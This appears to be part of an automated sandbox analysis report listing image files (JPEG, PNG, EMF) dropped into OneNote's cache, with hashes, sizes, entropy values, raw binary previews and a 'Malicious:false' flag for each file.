                                                                                                                                                                                                                  Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:26:15.....................................................................................(.....................&...........s.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................#.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?....NC+n....<.=.7..&.8A56..@^.Q..\\...E.>..".&G.......J .'....$.I)........0.../..mv...D....<v0=..ugc+..l.o...=.c.......x.&D..{`8...v

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000009R.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:09:29], progressive, precision 8, 609x675, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):65998
                                                                                                                                                                                                                  Entropy (8bit):7.671031449942883
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:klZtmExaFrtWgpc+Sg+DKeplHClpHfRtPMbe:VEWWl+SNDKqlH8p/vse
                                                                                                                                                                                                                  MD5:B4F0A040890EE6F61EF8D9E094893C9C
                                                                                                                                                                                                                  SHA1:303BCBA1D777B03BFD99CC01A48E0BB493C93E04
                                                                                                                                                                                                                  SHA-256:1F81DDE3B42F23F0666D92EBF14D62893B31B39D72C07AEE070EAE28C2E6980E
                                                                                                                                                                                                                  SHA-512:8F07E4D519F2FD001006BB34F7F8274B9AF9EC55367B88D41D24E5824FCE4354FD1290CE4735E43930829702ED53F41DF02C673904A7091E9354C28E029AD4EF
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:09:29.............................a.......................................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..-O..s(...gO..@...[..+....+...H.'m........L.......@.......[k...S..O..p.'{X..3......]W..w.+.V....[.-.....2..i..i$.p.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000009T.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):32656
                                                                                                                                                                                                                  Entropy (8bit):3.9517299510231485
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:qR0eV0V6zLq8fAy7TtS1O6VILpjH5og6NJgnIuu57aqP+Tg3QePV2P6hqaJDyjJg:qlzzaRpbd1
                                                                                                                                                                                                                  MD5:DD4CA4BC0A73FCB71BEBAA3C29CB8F66
                                                                                                                                                                                                                  SHA1:1A7085771D7941540EC94A1BD24D7CC8EA556D4B
                                                                                                                                                                                                                  SHA-256:0401451E1D1D7DFDC29AD1B2B68A6C8AC0B706E9868BF22FAB26A01CD48620CE
                                                                                                                                                                                                                  SHA-512:5B7D386C46EC75E21DE94DBCA922FB9A6E5358DEB3D60FEEE7B197D739F15D11050825D9323502EDFAF60720F1074DE896B23E71C44D07C9C7E943C31FDC078A
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:....l...r...1...*...^...bX.......^...... EMF........h...................`...E...........................(...F...,... ...EMF+.@..................,...,...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........F...(.......GDIC....s...2...+...^.......F...(.......GDIC....s...2.......N.......F...........EMF+*@..$..........?...........?.........@........................(E..HB.'E..HB.0'EI.`B.0'EU5.B.0'E..B.'EU5.B..(EU5.B.(EU5.B..(E..B..(EU5.B..(EI.`B.(E..HB..(E..HB.................@..............!.......b...........$...$......>...........>............'......................%.......................;.......U...P........................T...S...S...S...S8..Si..Ti.@Ti.qT8.qT..qT..@T...T..<.......>.......r...1.......N...............%...........$...$......A...........A............"...........F...........EMF+.@..........F...........GDIC....F...(.......GDIC........2.......N.......F...........EMF+*@..$..........?...........?.........@.......................}*E

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000009U.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 189 x 305, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):12824
                                                                                                                                                                                                                  Entropy (8bit):7.974776104184905
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:gzPrAZvq82AP0/DHbSczEegiAh1Hfgr3ZO7EFKWHaXIXqu:erAZz200/TbJzDgiWgjZO7EFKEaXIf
                                                                                                                                                                                                                  MD5:2628353534C5AD86CBFE57B6616D46DD
                                                                                                                                                                                                                  SHA1:244B7E39D6CEF5B07FCDE80554D31F7DA240BB0D
                                                                                                                                                                                                                  SHA-256:69BDB000AC7E030B0B28E6CE78F19547D235355B3B841146951AD1294429FA51
                                                                                                                                                                                                                  SHA-512:2529F97BE62DE038445D1C86EE2C01404FB1A2D83A5D16C7B5F4E21723C17EC86FA180DFE10342536CFD7D334EA3AF1FFE151B77F2FBFFFE8E7B2A0C2A3ACD59
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....).'....sRGB.........pHYs..........+....1.IDATx^.}.w\.n...A.H...E.J...l.......p...\{.w...e.-K.%..d.9..DN...^}..p.L...._$.t...n.=U..ID..]~(.?.)J...-.../.......0V..........'.)1X..c..D..2..A'f."...Ru..R=b..\....\.n.0...7.~".'..s!bd.|..p.u....-w'.....R.........i]..r....A.........r#...W..f{O.2~C.O........{.....3..W.}e:...~.....4.......t.Mv_....}*f..I...x11....d..6.@..O.......f.e..K.....L]..gohj&D..+.....#...#.J...n/]...8~.....zx.'.LI6..W....p...................V.F.. ...y.[.kl<?.^....N..$..7j.biU....c.51{S{.....q....c...<..x..............zG.F*.........U.w..fE.....DU.......WG7.5uC...7.....j..7yM...~jU..;J..a|LoG..x..<^.Z ...Z.....ip....._.4......f.rg..[...z....x1k.....z...K.l...;6.\..Y.#.WT.p.@{W....>.+..*..W....'v.nV...YA[.q!\.\...9..3.[|....7...HO......2<.....w.,].T^eN..XB.....M3...I.k...e..8...lZ.R...T.%......|N.w..9..!..O.-p..NA.eD_.d..nW2!...N...z>..;....=t#....H,.N.|. ......EC..............1.\

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000009V.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):32656
                                                                                                                                                                                                                  Entropy (8bit):3.9517299510231485
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:qR0eV0V6zLq8fAy7TtS1O6VILpjH5og6NJgnIuu57aqP+Tg3QePV2P6hqaJDyjJg:qlzzaRpbd1
                                                                                                                                                                                                                  MD5:DD4CA4BC0A73FCB71BEBAA3C29CB8F66
                                                                                                                                                                                                                  SHA1:1A7085771D7941540EC94A1BD24D7CC8EA556D4B
                                                                                                                                                                                                                  SHA-256:0401451E1D1D7DFDC29AD1B2B68A6C8AC0B706E9868BF22FAB26A01CD48620CE
                                                                                                                                                                                                                  SHA-512:5B7D386C46EC75E21DE94DBCA922FB9A6E5358DEB3D60FEEE7B197D739F15D11050825D9323502EDFAF60720F1074DE896B23E71C44D07C9C7E943C31FDC078A
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:....l...r...1...*...^...bX.......^...... EMF........h...................`...E...........................(...F...,... ...EMF+.@..................,...,...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........F...(.......GDIC....s...2...+...^.......F...(.......GDIC....s...2.......N.......F...........EMF+*@..$..........?...........?.........@........................(E..HB.'E..HB.0'EI.`B.0'EU5.B.0'E..B.'EU5.B..(EU5.B.(EU5.B..(E..B..(EU5.B..(EI.`B.(E..HB..(E..HB.................@..............!.......b...........$...$......>...........>............'......................%.......................;.......U...P........................T...S...S...S...S8..Si..Ti.@Ti.qT8.qT..qT..@T...T..<.......>.......r...1.......N...............%...........$...$......A...........A............"...........F...........EMF+.@..........F...........GDIC....F...(.......GDIC........2.......N.......F...........EMF+*@..$..........?...........?.........@.......................}*E

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000A0.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 189 x 305, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):12824
                                                                                                                                                                                                                  Entropy (8bit):7.974776104184905
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:gzPrAZvq82AP0/DHbSczEegiAh1Hfgr3ZO7EFKWHaXIXqu:erAZz200/TbJzDgiWgjZO7EFKEaXIf
                                                                                                                                                                                                                  MD5:2628353534C5AD86CBFE57B6616D46DD
                                                                                                                                                                                                                  SHA1:244B7E39D6CEF5B07FCDE80554D31F7DA240BB0D
                                                                                                                                                                                                                  SHA-256:69BDB000AC7E030B0B28E6CE78F19547D235355B3B841146951AD1294429FA51
                                                                                                                                                                                                                  SHA-512:2529F97BE62DE038445D1C86EE2C01404FB1A2D83A5D16C7B5F4E21723C17EC86FA180DFE10342536CFD7D334EA3AF1FFE151B77F2FBFFFE8E7B2A0C2A3ACD59
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....).'....sRGB.........pHYs..........+....1.IDATx^.}.w\.n...A.H...E.J...l.......p...\{.w...e.-K.%..d.9..DN...^}..p.L...._$.t...n.=U..ID..]~(.?.)J...-.../.......0V..........'.)1X..c..D..2..A'f."...Ru..R=b..\....\.n.0...7.~".'..s!bd.|..p.u....-w'.....R.........i]..r....A.........r#...W..f{O.2~C.O........{.....3..W.}e:...~.....4.......t.Mv_....}*f..I...x11....d..6.@..O.......f.e..K.....L]..gohj&D..+.....#...#.J...n/]...8~.....zx.'.LI6..W....p...................V.F.. ...y.[.kl<?.^....N..$..7j.biU....c.51{S{.....q....c...<..x..............zG.F*.........U.w..fE.....DU.......WG7.5uC...7.....j..7yM...~jU..;J..a|LoG..x..<^.Z ...Z.....ip....._.4......f.rg..[...z....x1k.....z...K.l...;6.\..Y.#.WT.p.@{W....>.+..*..W....'v.nV...YA[.q!\.\...9..3.[|....7...HO......2<.....w.,].T^eN..XB.....M3...I.k...e..8...lZ.R...T.%......|N.w..9..!..O.-p..NA.eD_.d..nW2!...N...z>..;....=t#....H,.N.|. ......EC..............1.\

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000A1.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):32656
                                                                                                                                                                                                                  Entropy (8bit):3.9517299510231485
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:qR0eV0V6zLq8fAy7TtS1O6VILpjH5og6NJgnIuu57aqP+Tg3QePV2P6hqaJDyjJg:qlzzaRpbd1
                                                                                                                                                                                                                  MD5:DD4CA4BC0A73FCB71BEBAA3C29CB8F66
                                                                                                                                                                                                                  SHA1:1A7085771D7941540EC94A1BD24D7CC8EA556D4B
                                                                                                                                                                                                                  SHA-256:0401451E1D1D7DFDC29AD1B2B68A6C8AC0B706E9868BF22FAB26A01CD48620CE
                                                                                                                                                                                                                  SHA-512:5B7D386C46EC75E21DE94DBCA922FB9A6E5358DEB3D60FEEE7B197D739F15D11050825D9323502EDFAF60720F1074DE896B23E71C44D07C9C7E943C31FDC078A
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:....l...r...1...*...^...bX.......^...... EMF........h...................`...E...........................(...F...,... ...EMF+.@..................,...,...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........F...(.......GDIC....s...2...+...^.......F...(.......GDIC....s...2.......N.......F...........EMF+*@..$..........?...........?.........@........................(E..HB.'E..HB.0'EI.`B.0'EU5.B.0'E..B.'EU5.B..(EU5.B.(EU5.B..(E..B..(EU5.B..(EI.`B.(E..HB..(E..HB.................@..............!.......b...........$...$......>...........>............'......................%.......................;.......U...P........................T...S...S...S...S8..Si..Ti.@Ti.qT8.qT..qT..@T...T..<.......>.......r...1.......N...............%...........$...$......A...........A............"...........F...........EMF+.@..........F...........GDIC....F...(.......GDIC........2.......N.......F...........EMF+*@..$..........?...........?.........@.......................}*E

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000A2.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 189 x 305, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):12824
                                                                                                                                                                                                                  Entropy (8bit):7.974776104184905
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:gzPrAZvq82AP0/DHbSczEegiAh1Hfgr3ZO7EFKWHaXIXqu:erAZz200/TbJzDgiWgjZO7EFKEaXIf
                                                                                                                                                                                                                  MD5:2628353534C5AD86CBFE57B6616D46DD
                                                                                                                                                                                                                  SHA1:244B7E39D6CEF5B07FCDE80554D31F7DA240BB0D
                                                                                                                                                                                                                  SHA-256:69BDB000AC7E030B0B28E6CE78F19547D235355B3B841146951AD1294429FA51
                                                                                                                                                                                                                  SHA-512:2529F97BE62DE038445D1C86EE2C01404FB1A2D83A5D16C7B5F4E21723C17EC86FA180DFE10342536CFD7D334EA3AF1FFE151B77F2FBFFFE8E7B2A0C2A3ACD59
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....).'....sRGB.........pHYs..........+....1.IDATx^.}.w\.n...A.H...E.J...l.......p...\{.w...e.-K.%..d.9..DN...^}..p.L...._$.t...n.=U..ID..]~(.?.)J...-.../.......0V..........'.)1X..c..D..2..A'f."...Ru..R=b..\....\.n.0...7.~".'..s!bd.|..p.u....-w'.....R.........i]..r....A.........r#...W..f{O.2~C.O........{.....3..W.}e:...~.....4.......t.Mv_....}*f..I...x11....d..6.@..O.......f.e..K.....L]..gohj&D..+.....#...#.J...n/]...8~.....zx.'.LI6..W....p...................V.F.. ...y.[.kl<?.^....N..$..7j.biU....c.51{S{.....q....c...<..x..............zG.F*.........U.w..fE.....DU.......WG7.5uC...7.....j..7yM...~jU..;J..a|LoG..x..<^.Z ...Z.....ip....._.4......f.rg..[...z....x1k.....z...K.l...;6.\..Y.#.WT.p.@{W....>.+..*..W....'v.nV...YA[.q!\.\...9..3.[|....7...HO......2<.....w.,].T^eN..XB.....M3...I.k...e..8...lZ.R...T.%......|N.w..9..!..O.-p..NA.eD_.d..nW2!...N...z>..;....=t#....H,.N.|. ......EC..............1.\

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000A4.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):39010
                                                                                                                                                                                                                  Entropy (8bit):7.362726513389497
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:6tCjwO+E+KW0ZtOgepcoWW4pAWQ6/KWcR474HOAZaDfK:68j+E+KW0HOgep/72/NKWcRNefK
                                                                                                                                                                                                                  MD5:9700DE02720CDB5A45EDE51F1A4647EC
                                                                                                                                                                                                                  SHA1:CF72A73E1181719B1CC45C2FE0A6B619081E115E
                                                                                                                                                                                                                  SHA-256:7E6A7714A69688D9FFDF16AA942B66064A0C77FCD9B3E469F89730B4B9290C3E
                                                                                                                                                                                                                  SHA-512:5438921467D62376472007B9EBF3C35C9D9FE3EDE04D99A990129332D53EBC8EE2555C0319A4F7C0DF63516F29CEDF2171D8B6DC34C9FCD075C2CA41EB728660
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.........................................................................................!1..A...Qaq..".......2BR#...b%&6..'w.r.3f7W8.s5EUeF.g....CS$4.Vv..Tdt..G..(c..u.Hhx.......................!1.AQa..2.q....".s...3.4BRr.#......b.$c............?........uf.....t...;..[...W.h.....-.k.f..i.u..KQ..b.F...rM%/.8n.S..=9.....G$O;.f.}L..N..U._i.[.X...3.~....S.~..+t$...c.5......{..X/..#.G...}s....6......^....o~.$.\WA?...^*w[O.~..6..~....a....~..:..0.......{O...|.s.u._w.........i...........{K...._.?.../{.....A..8....<g.iu..<..................X......|]v....D..9.k.w.|-IF.Tv.-.&.........."'.4.b....z.._.Z.....G...u.xyt./_.q..m>..S.V.Xdc.bw.T.W......g..........}s.._..?....U]_.......`......>.|'.~xH....,...?........?.q....o../..R..;...Y.G....A"?......?.<..1...w..o.M.........tco.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000A6.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):25622
                                                                                                                                                                                                                  Entropy (8bit):7.058784902089801
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:EhK81gTCyJ/Gf9Aw3t8w8EtdPeGDh6bEi1Ie1u4ZbvgwTwrSRh7ZKNpIGY:IjcRXwdJvtdGsUbEi1IeY8vgwTyC1+Y
                                                                                                                                                                                                                  MD5:F8CCFC24DEB1D991EBE085E1B2D7D9BF
                                                                                                                                                                                                                  SHA1:AF76C22A765434AEDA134924C517C84107F4FED5
                                                                                                                                                                                                                  SHA-256:7354001527AB554C44E7D6981B86DD933B7DC2E0D3DC8512AD3EECD843245C52
                                                                                                                                                                                                                  SHA-512:818BC3690B01B30BC571E4CF45EC8D1AFCAECBAB003532644381F1CF730A5B3486862D08F7579B2D3D89167AD7DF35028881245C9550B0DA23D1F81A720A9704
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!...1A.Qaq.........."2Rr.#.t6..B..3S$4..v.b..Cs.%5..8..cUV.(.DEe.&Ff...T.d.......................!.1A..Qaq...s4....2r..S"BR.3....b#C$.....c............?..D.."}:......&&...?3..W.q*.......]...m.Y.k1......K).J...uV.b.../.0.E.H..4..W_T.[t.V.w.9.x.qe.L..o.oL.....d.\.....6.|.o...}..H{Yn..E...6Y3.l.e..D.:,.n.%...t...m.........,+,..|..n.....6.*...f........6.../$../Vi..H...e.f.F.zn.).n.E..2sTn.i...Yb?6+H&...Bf..*....z.o.^7[..u.:o....t.s=.....(.s.....f.g....q9o.u1L.N...smzE..[>...+\O....j.<....j.c.W.............U..+.F/.'..W...T./W...>i01./....j.s."..Q...{...a._~OW...Rp.)*.e..W..Q4)<..'..W...q...'..U..z..g......U}...O....w....0F:.N..V.3W.|..'z0.]...j..U[v..g$D.Lc[.e...UW.m0+

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000A8.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 50 x 500, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2033
                                                                                                                                                                                                                  Entropy (8bit):6.8741208714657
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:P37XYSDTz+UUl7DHt7Ah8l1+4ZfFclFUXwobKXlZr:v7j3z+UoDN0h8ugf2AwobMN
                                                                                                                                                                                                                  MD5:CA7D2BECCBC3741D73453DCF21D846E0
                                                                                                                                                                                                                  SHA1:E34B7788498E33FFF0CFB00125E6BA9E090F6CED
                                                                                                                                                                                                                  SHA-256:E9EAD0BFC09D32CB366010CDFEDE1C432A2D1D550CB7332BADAC1BEE9482BC86
                                                                                                                                                                                                                  SHA-512:7FE2C3654262B1EEBED4F6D83DA7D3450E1BE52500A3964185FC0092041506A237A2728E5D7EEA0A3814E413E822B803B789C49CF744D51816A2E4EDE5B4247B
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...2.........H'......PLTE........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................[....bKGD....H....cmPPJCmp0712....H.s.....IDATx^.\.W.G...=a.ewA..a.!r( ...%Dc..x.x....N.OO...3=...S...........~.z.D.0...g.2P.7.*M.#'....z.......3TPj.Z.[5....V..z'L3...a.j9..C>..9.z

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000AA.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):55804
                                                                                                                                                                                                                  Entropy (8bit):7.433623355028275
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:gVvci05lhVbfBcWvBLeynluexaWqzww/u5:gVUZhHDljaHww/u5
                                                                                                                                                                                                                  MD5:4126992F65FE53D3E3E78F6B27FD49DC
                                                                                                                                                                                                                  SHA1:BC0D76B69310DA9B909D3EE4CECBFE5F386BFB45
                                                                                                                                                                                                                  SHA-256:3FBE3C1C238BD7DBC67F8CFF5F3BDDFD513C96A9851B9616477947D21DFF4B2E
                                                                                                                                                                                                                  SHA-512:624853F5E56D224C8188F122B2C4724F867D4099E7FAAFB9C945BE7E2907900ADCF4AE97AB08909CF94E96FB6F381E3B6396D560D93EB2731E4E69CBFE628F10
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d..............................................................................................!1...AQ.aq"2.....BR..8x..r#..9b....3....CS$.'.cs.......7Gw.(.4%5&..Wg.h......tEVfv..H..........................!1A..Qa.q...."2..u6....BRr.#...b..3s..d...7.Cc.$Tt..S4.5Ue..&..%.................?...,...8..{..S.y.N....%..q.8..H[5....o..xg........)c(.eO.YO..._D..x.U.....%.S.r.r._.^..Su.h.Q.t.:.#?....x..B.S...Q.....oqF..%..8'.qx....%.2JKjF..{y.w0.*a.RMb.c.Q{%....eW'..[IV..'ZW3...[...MN.....rO.:....$.i..7....Vrrr...I.r..M..Qo..j....q.^...N...J......%.J..)F...>$.....u........o...+......[...*..t....R}.I..R..S..GB..:......).6_[^Xft...F.1.....zP....,.#....MG.T..Q.F.....)Fi../.I...,%.voEb.b.Z..V3..FT.}..[Z{....wd.z.e.....QwW(.).t..\..'....:)<W.<..&k...caRT.X(..K.....:f...]...q..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000AC.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:08:07], baseline, precision 8, 595x450, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):59832
                                                                                                                                                                                                                  Entropy (8bit):7.308211468398169
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:HS9SYFtN0+CRa9mfJy4zBAiIJhzrkHDV2hJK:yAmta+Tyy4zBIJW5WK
                                                                                                                                                                                                                  MD5:DCDD543A4E0BA2C1909BA095D46FFBCB
                                                                                                                                                                                                                  SHA1:B86C89537138FE07255354202D3EAD0B53B3C54D
                                                                                                                                                                                                                  SHA-256:28F334B77068F71F5F92A95695433B950610204A0E5580CE567DB8FAD4993ECB
                                                                                                                                                                                                                  SHA-512:5408C3259B7F3288A4BEB04342799AD5FE3A6F0EC7E92353B29B7E7E538DFA9903B39637226919E0421BC422635D25F5F8069DC7441864DC03E1B909BF5C2C84
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....H.H.....fExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:08:07.............................S.......................................................&.(.................................0.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d.................................................................................................................................................y...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?......;R~+'....xh..~.n-}.......Te................^B..IU_....._...S......h.......!....9...A}6V=J......C..c.....Ug.Wh......

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000AE.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):33032
                                                                                                                                                                                                                  Entropy (8bit):2.941351060644542
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:ofmqvnCfmqsp1Ue5xzMq+Qh0dffUmS0w5xzMq+Qh0di:AGAp1rmSl
                                                                                                                                                                                                                  MD5:ACF4A9F470281F475EA45E113E9FB009
                                                                                                                                                                                                                  SHA1:B20698DDA5E5AFDD86BB359A6578C9860D5DF71F
                                                                                                                                                                                                                  SHA-256:5DC2367A80588A7518DB5014122510BF0FD784711015EF83A8718336584F82D0
                                                                                                                                                                                                                  SHA-512:998B7DB9DB08FD15A293267E2371052E436E024AF8D34F96D3C8FF04B1316678DFC1674C921CB404121FF381A4FC39DC759E6698F19D42A6261CBD39469B0A08
                                                                                                                                                                                                                  Malicious:false
